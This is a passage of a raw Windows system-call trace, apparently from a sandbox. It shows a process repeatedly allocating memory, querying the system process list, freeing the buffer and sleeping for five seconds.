RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.831] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.832] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.832] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.832] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.836] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.836] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.838] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.839] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.843] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.844] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.845] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.845] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.849] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.850] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.852] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.852] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.853] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.856] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.857] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.859] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.859] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.860] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.860] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.863] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.865] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.866] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.867] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.868] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.871] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.872] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.874] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.875] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.875] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.878] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.879] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.883] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.884] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.884] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.884] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.888] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.889] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.890] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.890] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.891] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.891] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.891] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.895] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.896] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.897] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.897] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.898] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.898] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.899] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.902] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.902] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.904] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.904] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.905] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.905] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.909] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.910] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.911] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.911] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.912] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.913] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.916] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.917] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.919] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.920] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.920] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.923] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.924] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.926] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.926] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.927] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.927] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.930] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.931] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.933] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.934] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.934] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.937] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.938] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.940] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.940] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.941] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.941] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.941] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.944] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.945] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.947] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.948] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.948] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.948] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.951] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.952] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.953] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.959] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.960] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.961] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.961] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.962] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.962] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.962] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.966] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.967] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.968] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.969] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.969] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.974] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.975] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.977] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.977] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.978] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.978] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.978] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) 